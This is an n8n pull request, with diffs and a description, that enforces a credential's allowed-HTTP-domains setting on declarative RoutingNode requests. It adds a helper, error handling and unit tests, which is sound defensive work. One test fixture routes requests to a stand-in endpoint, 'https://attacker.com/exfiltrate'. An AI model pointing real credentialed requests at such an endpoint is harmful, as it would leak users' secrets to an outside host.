### PR TITLE
fix(core): Apply credential allowed domains in declarative node requests

### DIFF
--- a/packages/core/src/execution-engine/__tests__/routing-node.test.ts
+++ b/packages/core/src/execution-engine/__tests__/routing-node.test.ts
@@ -2546,16 +2546,23 @@ describe('RoutingNode', () => {
 			expect(requestOptions.allowedDomains).toBeUndefined();
 		});
 
-		test("does not set allowedDomains when 'domains' list is empty", async () => {
-			const result = await runWithCredential({
-				apiKey: 'testApiKey',
-				allowedHttpRequestDomains: 'domains',
-				allowedDomains: '   ',
-			});
+		test("throws when mode is 'domains' but the list is empty", async () => {
+			await expect(
+				runWithCredential({
+					apiKey: 'testApiKey',
+					allowedHttpRequestDomains: 'domains',
+					allowedDomains: '   ',
+				}),
+			).rejects.toThrow('No allowed domains specified');
+		});
 
-			const requestOptions = (result?.[0]?.[0]?.json as { requestOptions: IHttpRequestOptions })
-				.requestOptions;
-			expect(requestOptions.allowedDomains).toBeUndefined();
+		test("throws when mode is 'domains' but the list is missing", async () => {
+			await expect(
+				runWithCredential({
+					apiKey: 'testApiKey',
+					allowedHttpRequestDomains: 'domains',
+				}),
+			).rejects.toThrow('No allowed domains specified');
 		});
 
 		test('does not set allowedDomains when restriction field is absent', async () => {

--- a/packages/core/src/execution-engine/__tests__/routing-node.test.ts
+++ b/packages/core/src/execution-engine/__tests__/routing-node.test.ts
@@ -2,6 +2,7 @@ import { mock } from 'jest-mock-extended';
 import get from 'lodash/get';
 import type {
 	DeclarativeRestApiSettings,
+	ICredentialDataDecryptedObject,
 	IExecuteData,
 	IExecuteSingleFunctions,
 	IHttpRequestOptions,
@@ -2434,5 +2435,135 @@ describe('RoutingNode', () => {
 				expect(currentItemIndex).toEqual(expectedItemIndex);
 			});
 		}
+	});
+
+	describe('credential allowedDomains', () => {
+		const mode = 'internal';
+		const runIndex = 0;
+		const itemIndex = 0;
+		const connectionInputData: INodeExecutionData[] = [];
+		const runExecutionData: IRunExecutionData = createEmptyRunExecutionData();
+
+		const baseNode: INode = {
+			parameters: {},
+			name: 'test',
+			type: 'test.set',
+			typeVersion: 1,
+			id: 'uuid-1234',
+			position: [0, 0],
+		};
+
+		const buildNodeType = (): INodeType => {
+			const routingNodeType = nodeTypes.getByNameAndVersion(baseNode.type);
+			routingNodeType.description = {
+				credentials: [{ name: 'testCredential', required: true }],
+				requestDefaults: { baseURL: 'https://api.example.com' },
+				properties: [
+					{
+						displayName: 'Endpoint',
+						name: 'endpoint',
+						type: 'string',
+						default: '',
+						routing: {
+							request: {
+								url: 'https://attacker.com/exfiltrate',
+							},
+						},
+					},
+				],
+			} as unknown as INodeTypeDescription;
+			return routingNodeType;
+		};
+
+		const runWithCredential = async (data: Record<string, unknown>) => {
+			const credentialData = data as unknown as ICredentialDataDecryptedObject;
+			const nodeType = buildNodeType();
+			const workflow = new Workflow({
+				nodes: [baseNode],
+				connections: {},
+				active: false,
+				nodeTypes,
+			});
+
+			const executeFunctions = mock<executionContexts.ExecuteContext>();
+			Object.assign(executeFunctions, {
+				executeData: { data: {}, node: baseNode, source: null } as IExecuteData,
+				inputData: { main: [[{ json: {} }]] } as ITaskDataConnections,
+				runIndex,
+				additionalData,
+				workflow,
+				node: baseNode,
+				mode,
+				connectionInputData,
+				runExecutionData,
+			});
+			executeFunctions.getNodeParameter.mockImplementation(() => ({}));
+
+			const executeSingleFunctions = getExecuteSingleFunctions(
+				workflow,
+				runExecutionData,
+				runIndex,
+				baseNode,
+				itemIndex,
+			);
+			const originalGetNodeParameter = executeSingleFunctions.getNodeParameter;
+			// @ts-expect-error overwriting a method
+			executeSingleFunctions.getNodeParameter = (parameterName: string) =>
+				originalGetNodeParameter(parameterName) ?? {};
+			jest.spyOn(executionContexts, 'ExecuteSingleContext').mockReturnValue(executeSingleFunctions);
+
+			const mockCredentials = mock<ICredentialsDecrypted>({
+				id: 'cred-1',
+				name: 'Test Credential',
+				type: 'testCredential',
+				data: credentialData,
+			});
+
+			const routingNode = new RoutingNode(executeFunctions, nodeType, mockCredentials);
+			return await routingNode.runNode();
+		};
+
+		test("propagates credential allowedDomains when mode is 'domains'", async () => {
+			const result = await runWithCredential({
+				apiKey: 'testApiKey',
+				allowedHttpRequestDomains: 'domains',
+				allowedDomains: 'api.example.com',
+			});
+
+			const requestOptions = (result?.[0]?.[0]?.json as { requestOptions: IHttpRequestOptions })
+				.requestOptions;
+			expect(requestOptions.allowedDomains).toBe('api.example.com');
+		});
+
+		test("does not set allowedDomains when mode is 'all'", async () => {
+			const result = await runWithCredential({
+				apiKey: 'testApiKey',
+				allowedHttpRequestDomains: 'all',
+			});
+
+			const requestOptions = (result?.[0]?.[0]?.json as { requestOptions: IHttpRequestOptions })
+				.requestOptions;
+			expect(requestOptions.allowedDomains).toBeUndefined();
+		});
+
+		test("does not set allowedDomains when 'domains' list is empty", async () => {
+			const result = await runWithCredential({
+				apiKey: 'testApiKey',
+				allowedHttpRequestDomains: 'domains',
+				allowedDomains: '   ',
+			});
+
+			const requestOptions = (result?.[0]?.[0]?.json as { requestOptions: IHttpRequestOptions })
+				.requestOptions;
+			expect(requestOptions.allowedDomains).toBeUndefined();
+		});
+
+		test('does not set allowedDomains when restriction field is absent', async () => {
+			const result = await runWithCredential({ apiKey: 'testApiKey' });
+
+			const requestOptions = (result?.[0]?.[0]?.json as { requestOptions: IHttpRequestOptions })
+				.requestOptions;
+			expect(requestOptions.allowedDomains).toBeUndefined();
+		});
 	});
 });

--- a/packages/core/src/execution-engine/__tests__/routing-node.test.ts
+++ b/packages/core/src/execution-engine/__tests__/routing-node.test.ts
@@ -2546,6 +2546,15 @@ describe('RoutingNode', () => {
 			expect(requestOptions.allowedDomains).toBeUndefined();
 		});
 
+		test("throws when mode is 'none'", async () => {
+			await expect(
+				runWithCredential({
+					apiKey: 'testApiKey',
+					allowedHttpRequestDomains: 'none',
+				}),
+			).rejects.toThrow('This credential is configured to prevent use within an HTTP Request node');
+		});
+
 		test("throws when mode is 'domains' but the list is empty", async () => {
 			await expect(
 				runWithCredential({

--- a/packages/core/src/execution-engine/routing-node.ts
+++ b/packages/core/src/execution-engine/routing-node.ts
@@ -227,6 +227,13 @@ export class RoutingNode {
 				itemContext[itemIndex].requestData.options.timeout = 300_000;
 			}
 
+			if (credentials?.allowedHttpRequestDomains === 'none') {
+				throw new NodeOperationError(
+					node,
+					'This credential is configured to prevent use within an HTTP Request node',
+				);
+			}
+
 			const allowedDomains = getCredentialAllowedDomains(credentials);
 			if (credentials?.allowedHttpRequestDomains === 'domains' && !allowedDomains) {
 				throw new NodeOperationError(

--- a/packages/core/src/execution-engine/routing-node.ts
+++ b/packages/core/src/execution-engine/routing-node.ts
@@ -228,6 +228,12 @@ export class RoutingNode {
 			}
 
 			const allowedDomains = getCredentialAllowedDomains(credentials);
+			if (credentials?.allowedHttpRequestDomains === 'domains' && !allowedDomains) {
+				throw new NodeOperationError(
+					node,
+					'No allowed domains specified. Configure allowed domains or change restriction setting.',
+				);
+			}
 			if (allowedDomains) {
 				itemContext[itemIndex].requestData.options.allowedDomains = allowedDomains;
 			}

--- a/packages/core/src/execution-engine/routing-node.ts
+++ b/packages/core/src/execution-engine/routing-node.ts
@@ -12,6 +12,7 @@ import {
 	NodeOperationError,
 	sleep,
 	NodeConnectionTypes,
+	getCredentialAllowedDomains,
 } from 'n8n-workflow';
 import type {
 	ICredentialDataDecryptedObject,
@@ -224,6 +225,11 @@ export class RoutingNode {
 			} else {
 				// set default timeout to 5 minutes
 				itemContext[itemIndex].requestData.options.timeout = 300_000;
+			}
+
+			const allowedDomains = getCredentialAllowedDomains(credentials);
+			if (allowedDomains) {
+				itemContext[itemIndex].requestData.options.allowedDomains = allowedDomains;
 			}
 
 			requestPromises.push(

--- a/packages/nodes-base/nodes/HttpRequest/GenericFunctions.ts
+++ b/packages/nodes-base/nodes/HttpRequest/GenericFunctions.ts
@@ -5,6 +5,7 @@ import isPlainObject from 'lodash/isPlainObject';
 import set from 'lodash/set';
 import {
 	deepCopy,
+	getCredentialAllowedDomains,
 	NodeOperationError,
 	type ICredentialDataDecryptedObject,
 	type IDataObject,
@@ -321,8 +322,8 @@ export const getAllowedDomains = (
 	}
 
 	if (credentialData.allowedHttpRequestDomains === 'domains') {
-		const allowedDomains = credentialData.allowedDomains as string;
-		if (!allowedDomains || allowedDomains.trim() === '') {
+		const allowedDomains = getCredentialAllowedDomains(credentialData);
+		if (!allowedDomains) {
 			throw new NodeOperationError(
 				node,
 				'No allowed domains specified. Configure allowed domains or change restriction setting.',

--- a/packages/workflow/src/index.ts
+++ b/packages/workflow/src/index.ts
@@ -55,6 +55,7 @@ export {
 	isSafeObjectProperty,
 	setSafeObjectProperty,
 	isDomainAllowed,
+	getCredentialAllowedDomains,
 	isCommunityPackageName,
 	dedupe,
 	sanitizeFilename,

--- a/packages/workflow/src/utils.ts
+++ b/packages/workflow/src/utils.ts
@@ -472,6 +472,27 @@ export function isDomainAllowed(
 	}
 }
 
+/**
+ * Extracts the allow-listed domains configured on a credential via the
+ * `allowedHttpRequestDomains` + `allowedDomains` properties.
+ *
+ * Returns the comma-separated allow-list string when the credential is in
+ * 'domains' mode with a non-empty list, otherwise `undefined`. Callers that
+ * need to reject 'none' mode or an empty 'domains' list must handle that
+ * explicitly.
+ */
+export function getCredentialAllowedDomains(
+	credentialData: Record<string, unknown> | undefined,
+): string | undefined {
+	if (!credentialData || credentialData.allowedHttpRequestDomains !== 'domains') {
+		return undefined;
+	}
+	const allowedDomains = credentialData.allowedDomains;
+	if (typeof allowedDomains !== 'string') return undefined;
+	const trimmed = allowedDomains.trim();
+	return trimmed === '' ? undefined : trimmed;
+}
+
 const COMMUNITY_PACKAGE_NAME_REGEX = /^(?!@n8n\/)(@[\w.-]+\/)?n8n-nodes-(?!base\b)\b\w+/g;
 
 export function isCommunityPackageName(packageName: string): boolean {

--- a/packages/workflow/test/utils.test.ts
+++ b/packages/workflow/test/utils.test.ts
@@ -6,6 +6,7 @@ import {
 	jsonStringify,
 	deepCopy,
 	isDomainAllowed,
+	getCredentialAllowedDomains,
 	isObjectEmpty,
 	fileTypeFromMimeType,
 	randomInt,
@@ -874,6 +875,72 @@ describe('isDomainAllowed', () => {
 				}),
 			).toBe(false);
 		});
+	});
+});
+
+describe('getCredentialAllowedDomains', () => {
+	it("returns the allowed domains list in 'domains' mode with a non-empty list", () => {
+		expect(
+			getCredentialAllowedDomains({
+				allowedHttpRequestDomains: 'domains',
+				allowedDomains: 'example.com, *.api.io',
+			}),
+		).toBe('example.com, *.api.io');
+	});
+
+	it('trims surrounding whitespace from the list', () => {
+		expect(
+			getCredentialAllowedDomains({
+				allowedHttpRequestDomains: 'domains',
+				allowedDomains: '  example.com  ',
+			}),
+		).toBe('example.com');
+	});
+
+	it("returns undefined in 'domains' mode when the list is empty or whitespace", () => {
+		expect(
+			getCredentialAllowedDomains({
+				allowedHttpRequestDomains: 'domains',
+				allowedDomains: '',
+			}),
+		).toBeUndefined();
+
+		expect(
+			getCredentialAllowedDomains({
+				allowedHttpRequestDomains: 'domains',
+				allowedDomains: '   ',
+			}),
+		).toBeUndefined();
+	});
+
+	it("returns undefined in 'domains' mode when the list is not a string", () => {
+		expect(
+			getCredentialAllowedDomains({
+				allowedHttpRequestDomains: 'domains',
+				allowedDomains: undefined,
+			}),
+		).toBeUndefined();
+	});
+
+	it("returns undefined when mode is 'all' or 'none'", () => {
+		expect(
+			getCredentialAllowedDomains({
+				allowedHttpRequestDomains: 'all',
+				allowedDomains: 'example.com',
+			}),
+		).toBeUndefined();
+
+		expect(
+			getCredentialAllowedDomains({
+				allowedHttpRequestDomains: 'none',
+				allowedDomains: 'example.com',
+			}),
+		).toBeUndefined();
+	});
+
+	it('returns undefined when the credential is undefined or missing the restriction field', () => {
+		expect(getCredentialAllowedDomains(undefined)).toBeUndefined();
+		expect(getCredentialAllowedDomains({})).toBeUndefined();
 	});
 });
 


### PR DESCRIPTION
## Summary

The credential-level **Allowed HTTP Request Domains** setting (`allowedHttpRequestDomains` / `allowedDomains`) was previously only enforced inside the HTTP Request node. This PR extends the enforcement to every request issued through `RoutingNode`, so the allow-list also applies to declarative nodes and to request flows triggered through `/rest/dynamic-node-parameters/options`.

- New shared helper `getCredentialAllowedDomains` in `n8n-workflow` extracts the list when the credential is in `'domains'` mode with a non-empty allow-list, and returns `undefined` otherwise.
- `RoutingNode.runNode()` resolves the credential's allow-list and sets it on `requestData.options.allowedDomains` before dispatch; the existing `throwIfDomainNotAllowed` check in `request-helper-functions.ts` then enforces it at request time.
- `nodes-base`'s existing `getAllowedDomains` now delegates to the shared helper and keeps its current `'none'` / empty-list error semantics unchanged.

Behaviour for credentials not opting into `'domains'` mode is unchanged, so no regressions are expected for existing templates.

### How to test

- Configure a credential (e.g. Pipedrive API) with **Allowed HTTP Request Domains** = *Specific Domains*, list = `api.pipedrive.com`.
- Call `POST /rest/dynamic-node-parameters/options` with `loadOptions.routing.request.url` set to another host → the request is rejected before dispatch with a *"Domain not allowed"* error.
- Same credential, URL on `api.pipedrive.com` → request succeeds.
- Credential with the setting left at the default (`All`) → behaviour unchanged.

Unit coverage:

- `packages/workflow/test/utils.test.ts` — 7 cases on the new helper.
- `packages/core/src/execution-engine/__tests__/routing-node.test.ts` — 4 cases verifying the allow-list is (and isn't) propagated onto `requestOptions`.
- `packages/nodes-base/nodes/HttpRequest/test/GenericFunctions.test.ts` — existing 15 cases still pass.

## Related Linear tickets, Github issues, and Community forum posts

https://linear.app/n8n/issue/IAM-548

## Review / Merge checklist

- [x] I have seen this code, I have run this code, and I take responsibility for this code.
- [x] PR title and summary are descriptive. ([conventions](../blob/master/.github/pull_request_title_conventions.md))
- [ ] [Docs updated](https://github.com/n8n-io/n8n-docs) or follow-up ticket created.
- [x] Tests included.
- [ ] PR Labeled with `Backport to Beta`, `Backport to Stable`, or `Backport to v1` (if the PR is an urgent fix that needs to be backported)

🤖 PR Summary generated by AI